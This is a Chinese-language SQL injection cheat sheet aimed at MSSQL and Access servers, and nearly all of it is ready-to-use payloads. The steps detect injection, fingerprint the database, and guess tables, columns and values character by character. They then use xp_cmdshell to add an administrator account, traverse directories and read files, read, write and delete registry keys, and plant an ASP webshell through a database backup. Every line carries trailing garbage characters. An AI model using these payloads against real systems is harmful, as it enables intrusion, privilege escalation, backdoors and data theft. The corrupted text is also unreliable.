1.判断是否有注入;and 1=1 ;and 1=2 M"|({+9�eG
2.初步判断是否是mssql ;and user>0 _"�c:Z�!�L
".Sa[�A�;~
3.注入参数是字符'and [查询条件] and ''=' 1]]�#�HTwX
i� :S�ih"=
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �El4SL�'E@
BhC>G2 ^�7
5.判断数据库系统 P�1A�5Q�q�
e]@R'oM?#`
;and (select count(*) from sysobjects)>0 mssql w^wh|'u^_@
��@bO/5"X,
;and (select count(*) from msysobjects)>0 access Y!w �{,\3
fi�;0�0�>y
Tg�\wBhJr|
%�:/���?eZ
6.猜数据库 ;and (select Count(*) from [数据库名])>0 `sPH7��^�R
ewO��R��b�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 _1�kc�z]]F
�j�RYW3a_7
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ���Lm"zW>v
�(YKk���J�
9.(1)猜字段的ascii值(access) ������'���
z]bc�g$�m
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ��=��Xh�*w
h1jEulcMtq
(2)猜字段的ascii值(mssql) AP�M!�xX=N
35�PIfq��m
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �#AU�V&pI[
Cw�Q��RHi�
10.测试权限结构(mssql) �_8'z�"w�F
3KN>�t)A#�
g]Fm�%��iy
�ERZW���K�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- d<�+�@cf_9
�{&d )O���
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �w�C~LZSTt
]0@
0�6G(y
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 6�h3TU,$�r
fs;�pX/:FR
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- u RPvo}!=1
X�V��W�VY}
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- U�Tph(U#��
n06�J�g��+
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- [|{m�/`8�C
*>8�Y/3Y\B
;and 1=(select IS_MEMBER('db_owner'));-- =%ZR0cWPoI
9G=H�G={
C��WW|��?�
WpPI���6bd
11.添加mssql和系统的帐户 M�MS#Ci=Lj
����U���Rb
;exec master.dbo.sp_addlogin username;-- [&h%T;!Qii
;exec master.dbo.sp_password null,username,password;-- �g&`[�r6�B
�:elTqw>pn
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��kQQhZ8Ch
NQ���qq\h�
;exec master.dbo.xp_cmdshell 'net user username password 0F�G|s#I�g
�lJ/{.uK�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- h�(M��S�>=
MR-�cO��Pn
;exec master.dbo.xp_cmdshell 'net user username password /add';-- @1^:V�-��=
E!zAUEVQm[
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �C3GI?|�b
}j�6<�S-s~
�)*T��<�s�
d�6ABg�Qi0
12.(1)遍历目录 ruK,�Z,�3Q
fgE��Mn�;
;create table dirs(paths varchar(100), id int) ;/|3U7{�c�
+U= !s�v�E
;insert dirs exec master.dbo.xp_dirtree 'c:\' RuuXDuu:VL
�Z�����g~6
;and (select top 1 paths from dirs)>0 F,>-+�~L=�
tDw��j~{a~
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) A.�@��Af+�
rJqRzF{|P6
>S=,ype�~G
9d1 G��u�"
(2)遍历目录 7UA|G�2�Zr
�:MbD=��sX
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- QB�|D_?�]�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ���rN5;W�
hD!��9[�Gb
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 KM jn��Y2
@#W$7Gw�f0
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ;�OD+6@Sr
���SF?s^
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 3&ES?�MyB#
]`GDZw���`
�*, RxOz2=
�**L�3T3$)
13.mssql中的存储过程 *�Qe{C��E�
�[�[�8.�Xb
xp_regenumvalues 注册表根键, 子键 sksop4g�u5
�e�lzKt�Vw
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 2�-!n+#Cdf
�2�B='��'W
xp_regread 根键,子键,键值名 |y~u�n9j�+
qs'gg�F1��
;exec xp_regread N�>�3X!�K
6�A \Z221E
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 5|�Or,8r(C
AiE\PMF~{P
xp_regwrite 根键,子键, 值名, 值类型, 值 ���s#2<^6�
�\~ql�_X;3
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 # 5�C�)k5�
h`�HdM58CQ
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 s�g!*�%*XQ
LJII�7��<k
xp_regdeletevalue 根键,子键,值名 ���|`i.�8�
SP
|R4*�KY
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 wM#BQe3t#
�X=d;WT4,,
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 <<:a�>)6\�
�#ZS8}X�*S
TS�Cc��=c�
*�U�l��L\�
14.mssql的backup创建webshell ��VG+WV��k
Up|�>)WFw"
use model 8�NS1*�\�z
v�'zj<�|�2
create table cmd(str image); 2�E
X Rq��
6
SosVE>Z�
insert into cmd(str) values (''); aA/.E�Ac7�
SX���I3�y�
backup database model to disk='c:\l.asp'; �LUje�v\Re
999E0A$dkv
�F�6h|AF|"
�)�-4x�I4�
15.mssql内置函数 �;4�rTm@6�
!�j�|�93�*
;and (select @@version)>0 获得Windows的版本号 �_Z|��3q�Q
rJ UXA�<:2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ]�A2l%�V_7
.0zN�����t
;and (select user_name())>0 爆当前系统的连接用户 "p��{c�z(�
rtM!|�a�pr
;and (select db_name())>0 得到当前连接的数据库 zxr|:KC ?&
YN@�4.&RP�
Qy+&�N*k�>
z�z+p6`� �
16.简洁的webshell td6$w:SN,l
�@�xI:Zt�M
use model � 4�[]���/
-�n�`�igC�
create table cmd(str image); ��HRY?�[�+
g@�jA�Iy]�
insert into cmd(str) values (''); �L9=D�,C~
Ydr�/ T�/1
backup database model to disk='g:\wwwtest\l.asp';
